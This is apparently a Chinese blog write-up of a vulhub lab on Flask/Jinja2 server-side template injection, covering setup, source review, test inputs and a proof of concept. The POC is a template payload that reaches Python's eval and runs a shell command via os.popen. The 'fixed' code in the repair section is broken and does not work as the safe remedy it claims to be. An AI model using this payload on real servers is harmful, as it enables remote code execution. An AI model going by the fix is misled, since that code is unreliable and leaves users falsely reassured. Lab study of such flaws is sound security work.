zoukankan      html  css  js  c++  java
  • Flask

    一、环境准备:

    1.打开vulhub,进入到flask/ssti目录下

    2.对靶场进行编译

    docker-compose build

    3.运行靶场

    docker-compose up -d

    4.移除环境

    docker-compose down

    二、漏洞复现:

    1.进入浏览器页面,访问127.0.0.1:8000,

    docker ps
    // 查看端口号

    2.查看源码,

    ls
    cd src
    ls
    cat app.py

    3.根据源码可知,name为用户输入字段,随意输入进行验证,

    核心语句:

    t = Template("Hello " + name)
    // 函数利用get获取参数进入template,形成任意构造注入。
    //Template()完全可控,那么就可以直接写入jinja2的模板语言。

    验证语句:

    http://127.0.0.1:8000/?name=s1mpL3
    http://127.0.0.1:8000/?name={{2*2}}
    http://127.0.0.1:8000/?name={{'xiaojian'.upper()}}

    三、漏洞修复:

    修改后:

    from flask import Flask, request
    from jinja2 import Template
    
    app = Flask(__name__)
    
    @app.route("/s1mpL3")
    def index():
        name = request.args.get('name', 'guest')
    
        t = Template("Hello " + {{defense}})
        return t.render(defense=name)
    
    if __name__ == "__main__":
        app.run()

    此时可以避免代码注入。

    四、漏洞利用:

    官方POC - 获取eval函数执行任意代码测试:

    {% for c in [].__class__.__base__.__subclasses__() %}
    {% if c.__name__ == 'catch_warnings' %}
      {% for b in c.__init__.__globals__.values() %}
      {% if b.__class__ == {}.__class__ %}
        {% if 'eval' in b.keys() %}
          {{ b['eval']('__import__("os").popen("id").read()') }}
        {% endif %}
      {% endif %}
      {% endfor %}
    {% endif %}
    {% endfor %}

    执行:

    http://127.0.0.1:8000/?name={% for c in [].__class__.__base__.__subclasses__() %}
    {% if c.__name__ == 'catch_warnings' %}
      {% for b in c.__init__.__globals__.values() %}
      {% if b.__class__ == {}.__class__ %}
        {% if 'eval' in b.keys() %}
          {{ b['eval']('__import__("os").popen("id").read()') }}
        {% endif %}
      {% endif %}
      {% endfor %}
    {% endif %}
    {% endfor %}

    五、参考:

    https://www.jianshu.com/p/a1d6ae580add

    https://blog.csdn.net/yukinorong/article/details/106938717

  • 相关阅读:
    leetcode35. search Insert Position
    leetcode26.Remove Duplicates from Sorted Array
    leetcode46.Permutation & leetcode47.Permutation II
    leetcode.5 Longest Palindromic Substring
    [转载] C++中new和malloc的区别
    [转载] C++中的自由存储区和堆
    xCode8以及iOS10 的新特性
    cell上添加倒计时,以及时差问题的解决
    cell的复用机制
    iOS 懒加载模式
  • 原文地址:https://www.cnblogs.com/3cH0-Nu1L/p/14607942.html
Copyright © 2011-2022 走看看